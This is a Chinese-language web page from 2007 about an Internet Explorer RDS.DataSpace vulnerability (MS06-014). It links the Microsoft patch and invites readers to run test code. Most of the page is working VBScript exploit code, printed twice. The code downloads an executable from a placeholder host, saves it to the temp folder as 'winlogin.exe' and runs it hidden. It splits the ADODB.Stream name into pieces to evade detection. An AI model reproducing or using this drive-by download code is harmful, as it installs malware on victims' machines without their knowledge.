【最新漏洞】IE中使用Rds.DataSpace下載并運行病毒文件
更新時間:2007年02月23日 00:00:00 作者:
請執(zhí)行下面的代碼測試您的機器是否存在漏洞:
[Ctrl+A 全選 注:引入外部Js需再刷新一下頁面才能執(zhí)行]
補丁下載:http://www.microsoft.com/china/technet/Security/bulletin/ms06-014.mspx
相關(guān)病毒的vbs代碼如下:
on error resume next
dl = "http://www.xxx.com/xxx.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="winlogin.exe"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
[Ctrl+A 全選 注:引入外部Js需再刷新一下頁面才能執(zhí)行]
補丁下載:http://www.microsoft.com/china/technet/Security/bulletin/ms06-014.mspx
相關(guān)病毒的vbs代碼如下:
復(fù)制代碼 代碼如下:
on error resume next
dl = "http://www.xxx.com/xxx.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="winlogin.exe"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
相關(guān)文章
愛戀千雪-US-AscII加密解密工具(網(wǎng)頁加密)下載
愛戀千雪-US-AscII加密解密工具(網(wǎng)頁加密)下載...2007-06-06javascript又一解密過程,推薦的,會這個基本上好多都能解決了
javascript又一解密過程,推薦的,會這個基本上好多都能解決了...2007-05-05通過Unicode轉(zhuǎn)義序列來加密,按你說的可以算是混淆吧
通過Unicode轉(zhuǎn)義序列來加密,按你說的可以算是混淆吧...2007-05-05